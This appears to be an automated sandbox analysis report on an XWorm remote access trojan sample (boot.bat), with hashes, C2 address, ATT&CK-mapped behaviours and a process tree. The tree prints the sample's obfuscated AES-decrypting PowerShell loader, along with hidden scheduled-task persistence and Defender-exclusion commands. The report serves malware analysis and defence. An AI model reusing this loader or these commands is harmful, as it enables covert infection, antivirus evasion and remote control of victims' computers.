xworm | f3d0b86b5b93ff36ccb01f326eae7b612a3016c6d570478de2211d01d2e39cbd

Analysis

max time kernel
86s
max time network
143s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
07/07/2024, 00:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

boot.bat
Size

410KB
MD5

d87efb4cf8da07e1956944f23313bb5b
SHA1

929203873eaf41e02377a26e1ef4db8a88d37696
SHA256

f3d0b86b5b93ff36ccb01f326eae7b612a3016c6d570478de2211d01d2e39cbd
SHA512

d726064d2833f4ee4a52dc85515f6dd471e72acd53d2576916313a0aaa224e199ba56cdf6fbd5fe4b21be62ab38779adc1b977b333971f160ac8cf3e26ba952a
SSDEEP

12288:xpWbCqT4gUVKkPSmSZ+XPk6V4mzYWQvKMbGt:xkGqTjURpXPkAUvvKMit

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

case-shield.gl.at.ply.gg:26501

Attributes

Install_directory
%Userprofile%
install_file
system.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1428-176-0x000001F0653A0000-0x000001F0653BA000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	1428	powershell.exe
6	1428	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2988	powershell.exe
4680	powershell.exe
1428	powershell.exe
3792	powershell.exe
4912	powershell.exe
1052	powershell.exe
3496	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4476	system.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\system.exe"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\system	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx	svchost.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE

Modifies data under HKEY_USERS 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	taskmgr.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4764	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2988	powershell.exe
2988	powershell.exe
2988	powershell.exe
4680	powershell.exe
4680	powershell.exe
4680	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
3792	powershell.exe
3792	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
3792	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
4912	powershell.exe
4912	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
4912	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe
1052	powershell.exe
1052	powershell.exe
1428	powershell.exe
1428	powershell.exe
1428	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3328	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs

pid	Process
788	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2988	powershell.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeIncreaseQuotaPrivilege	4680	powershell.exe
Token: SeSecurityPrivilege	4680	powershell.exe
Token: SeTakeOwnershipPrivilege	4680	powershell.exe
Token: SeLoadDriverPrivilege	4680	powershell.exe
Token: SeSystemProfilePrivilege	4680	powershell.exe
Token: SeSystemtimePrivilege	4680	powershell.exe
Token: SeProfSingleProcessPrivilege	4680	powershell.exe
Token: SeIncBasePriorityPrivilege	4680	powershell.exe
Token: SeCreatePagefilePrivilege	4680	powershell.exe
Token: SeBackupPrivilege	4680	powershell.exe
Token: SeRestorePrivilege	4680	powershell.exe
Token: SeShutdownPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeSystemEnvironmentPrivilege	4680	powershell.exe
Token: SeRemoteShutdownPrivilege	4680	powershell.exe
Token: SeUndockPrivilege	4680	powershell.exe
Token: SeManageVolumePrivilege	4680	powershell.exe
Token: 33	4680	powershell.exe
Token: 34	4680	powershell.exe
Token: 35	4680	powershell.exe
Token: 36	4680	powershell.exe
Token: SeIncreaseQuotaPrivilege	4680	powershell.exe
Token: SeSecurityPrivilege	4680	powershell.exe
Token: SeTakeOwnershipPrivilege	4680	powershell.exe
Token: SeLoadDriverPrivilege	4680	powershell.exe
Token: SeSystemProfilePrivilege	4680	powershell.exe
Token: SeSystemtimePrivilege	4680	powershell.exe
Token: SeProfSingleProcessPrivilege	4680	powershell.exe
Token: SeIncBasePriorityPrivilege	4680	powershell.exe
Token: SeCreatePagefilePrivilege	4680	powershell.exe
Token: SeBackupPrivilege	4680	powershell.exe
Token: SeRestorePrivilege	4680	powershell.exe
Token: SeShutdownPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeSystemEnvironmentPrivilege	4680	powershell.exe
Token: SeRemoteShutdownPrivilege	4680	powershell.exe
Token: SeUndockPrivilege	4680	powershell.exe
Token: SeManageVolumePrivilege	4680	powershell.exe
Token: 33	4680	powershell.exe
Token: 34	4680	powershell.exe
Token: 35	4680	powershell.exe
Token: 36	4680	powershell.exe
Token: SeIncreaseQuotaPrivilege	4680	powershell.exe
Token: SeSecurityPrivilege	4680	powershell.exe
Token: SeTakeOwnershipPrivilege	4680	powershell.exe
Token: SeLoadDriverPrivilege	4680	powershell.exe
Token: SeSystemProfilePrivilege	4680	powershell.exe
Token: SeSystemtimePrivilege	4680	powershell.exe
Token: SeProfSingleProcessPrivilege	4680	powershell.exe
Token: SeIncBasePriorityPrivilege	4680	powershell.exe
Token: SeCreatePagefilePrivilege	4680	powershell.exe
Token: SeBackupPrivilege	4680	powershell.exe
Token: SeRestorePrivilege	4680	powershell.exe
Token: SeShutdownPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeSystemEnvironmentPrivilege	4680	powershell.exe
Token: SeRemoteShutdownPrivilege	4680	powershell.exe
Token: SeUndockPrivilege	4680	powershell.exe
Token: SeManageVolumePrivilege	4680	powershell.exe
Token: 33	4680	powershell.exe
Token: 34	4680	powershell.exe
Token: 35	4680	powershell.exe

Suspicious use of FindShellTrayWindow 32 IoCs

pid	Process
3328	Explorer.EXE
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
3328	Explorer.EXE
3328	Explorer.EXE
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe

Suspicious use of SendNotifyMessage 35 IoCs

pid	Process
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe
4592	taskmgr.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1428	powershell.exe
3328	Explorer.EXE
3328	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4444 wrote to memory of 4912	4444	cmd.exe	74
PID 4444 wrote to memory of 4912	4444	cmd.exe	74
PID 4444 wrote to memory of 2988	4444	cmd.exe	75
PID 4444 wrote to memory of 2988	4444	cmd.exe	75
PID 2988 wrote to memory of 4680	2988	powershell.exe	76
PID 2988 wrote to memory of 4680	2988	powershell.exe	76
PID 2988 wrote to memory of 2204	2988	powershell.exe	79
PID 2988 wrote to memory of 2204	2988	powershell.exe	79
PID 2204 wrote to memory of 2288	2204	WScript.exe	80
PID 2204 wrote to memory of 2288	2204	WScript.exe	80
PID 2288 wrote to memory of 1328	2288	cmd.exe	82
PID 2288 wrote to memory of 1328	2288	cmd.exe	82
PID 2288 wrote to memory of 1428	2288	cmd.exe	83
PID 2288 wrote to memory of 1428	2288	cmd.exe	83
PID 1428 wrote to memory of 3328	1428	powershell.exe	54
PID 1428 wrote to memory of 1760	1428	powershell.exe	33
PID 1428 wrote to memory of 1364	1428	powershell.exe	25
PID 1428 wrote to memory of 2340	1428	powershell.exe	45
PID 1428 wrote to memory of 696	1428	powershell.exe	16
PID 1428 wrote to memory of 2332	1428	powershell.exe	44
PID 1428 wrote to memory of 360	1428	powershell.exe	15
PID 1428 wrote to memory of 1904	1428	powershell.exe	36
PID 1428 wrote to memory of 1564	1428	powershell.exe	28
PID 1428 wrote to memory of 4084	1428	powershell.exe	63
PID 1428 wrote to memory of 1752	1428	powershell.exe	32
PID 1428 wrote to memory of 4472	1428	powershell.exe	62
PID 1428 wrote to memory of 724	1428	powershell.exe	8
PID 1428 wrote to memory of 2692	1428	powershell.exe	48
PID 1428 wrote to memory of 1112	1428	powershell.exe	20
PID 1428 wrote to memory of 1892	1428	powershell.exe	35
PID 1428 wrote to memory of 1300	1428	powershell.exe	24
PID 1428 wrote to memory of 708	1428	powershell.exe	17
PID 1428 wrote to memory of 1692	1428	powershell.exe	31
PID 1428 wrote to memory of 900	1428	powershell.exe	13
PID 1428 wrote to memory of 1292	1428	powershell.exe	23
PID 1428 wrote to memory of 1092	1428	powershell.exe	19
PID 1428 wrote to memory of 3652	1428	powershell.exe	65
PID 1428 wrote to memory of 1484	1428	powershell.exe	27
PID 1428 wrote to memory of 2264	1428	powershell.exe	42
PID 1428 wrote to memory of 2460	1428	powershell.exe	47
PID 1428 wrote to memory of 3048	1428	powershell.exe	51
PID 1428 wrote to memory of 2248	1428	powershell.exe	41
PID 1428 wrote to memory of 2224	1428	powershell.exe	40
PID 1428 wrote to memory of 852	1428	powershell.exe	12
PID 1428 wrote to memory of 3204	1428	powershell.exe	53
PID 1428 wrote to memory of 1624	1428	powershell.exe	30
PID 1428 wrote to memory of 2408	1428	powershell.exe	46
PID 1428 wrote to memory of 1028	1428	powershell.exe	18
PID 1428 wrote to memory of 1224	1428	powershell.exe	22
PID 1428 wrote to memory of 788	1428	powershell.exe	11
PID 1428 wrote to memory of 1212	1428	powershell.exe	21
PID 1428 wrote to memory of 4752	1428	powershell.exe	60
PID 1428 wrote to memory of 1596	1428	powershell.exe	38
PID 1428 wrote to memory of 1476	1428	powershell.exe	26
PID 1428 wrote to memory of 1588	1428	powershell.exe	29
PID 1428 wrote to memory of 1768	1428	powershell.exe	34
PID 1428 wrote to memory of 2216	1428	powershell.exe	39
PID 1428 wrote to memory of 3792	1428	powershell.exe	84
PID 1428 wrote to memory of 3792	1428	powershell.exe	84
PID 788 wrote to memory of 3360	788	svchost.exe	86
PID 788 wrote to memory of 3360	788	svchost.exe	86
PID 1428 wrote to memory of 4912	1428	powershell.exe	87
PID 1428 wrote to memory of 4912	1428	powershell.exe	87
PID 1428 wrote to memory of 1052	1428	powershell.exe	89

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
1⤵
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:788
- C:\Windows\system32\wbem\wmiprvse.exe
  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  2⤵
  PID:3360
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
  2⤵
  PID:1952
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:2272
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
  2⤵
  PID:4992
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
  2⤵
  PID:2276
- C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  2⤵
  PID:320

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
1⤵
PID:852

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:900

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:360

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:696

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:708

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1028
- C:\Users\Admin\system.exe
  C:\Users\Admin\system.exe
  2⤵
  - Executes dropped EXE
  PID:4476
- C:\Users\Admin\system.exe
  C:\Users\Admin\system.exe
  2⤵
  PID:2988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
1⤵
PID:1092

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1112

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1212

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1224

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1292

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1300

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1364

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1476

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1484

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1564

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1588

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1624

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1760

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1768

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1892

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1904

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1596

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2216

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2224

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2248

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2264

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2332

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2340

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2408

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2460

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2692

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:3048

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3204

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\boot.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vyfdhzkOhzuWPMpvreY3vZeyScn6WHRZY2R7Zkbkj4Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DAJ/xPMYanv7GkLC2SESzQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ONxiA=New-Object System.IO.MemoryStream(,$param_var); $QiWju=New-Object System.IO.MemoryStream; $Ezkrm=New-Object System.IO.Compression.GZipStream($ONxiA, [IO.Compression.CompressionMode]::Decompress); $Ezkrm.CopyTo($QiWju); $Ezkrm.Dispose(); $ONxiA.Dispose(); $QiWju.Dispose(); $QiWju.ToArray();}function execute_function($param_var,$param2_var){ $lSZJJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YnjRv=$lSZJJ.EntryPoint; $YnjRv.Invoke($null, $param2_var);}$jEnct = 'C:\Users\Admin\AppData\Local\Temp\boot.bat';$host.UI.RawUI.WindowTitle = $jEnct;$VPrGj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jEnct).Split([Environment]::NewLine);foreach ($WvbhA in $VPrGj) { if ($WvbhA.StartsWith('JIMqBrjcUshFgASmplvD')) { $BgeIS=$WvbhA.Substring(20); break; }}$payloads_var=[string[]]$BgeIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:4912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_464_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_464.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4680
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_464.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2204
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_464.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2288
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vyfdhzkOhzuWPMpvreY3vZeyScn6WHRZY2R7Zkbkj4Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DAJ/xPMYanv7GkLC2SESzQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ONxiA=New-Object System.IO.MemoryStream(,$param_var); $QiWju=New-Object System.IO.MemoryStream; $Ezkrm=New-Object System.IO.Compression.GZipStream($ONxiA, [IO.Compression.CompressionMode]::Decompress); $Ezkrm.CopyTo($QiWju); $Ezkrm.Dispose(); $ONxiA.Dispose(); $QiWju.Dispose(); $QiWju.ToArray();}function execute_function($param_var,$param2_var){ $lSZJJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YnjRv=$lSZJJ.EntryPoint; $YnjRv.Invoke($null, $param2_var);}$jEnct = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_464.bat';$host.UI.RawUI.WindowTitle = $jEnct;$VPrGj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jEnct).Split([Environment]::NewLine);foreach ($WvbhA in $VPrGj) { if ($WvbhA.StartsWith('JIMqBrjcUshFgASmplvD')) { $BgeIS=$WvbhA.Substring(20); break; }}$payloads_var=[string[]]$BgeIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:1328
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
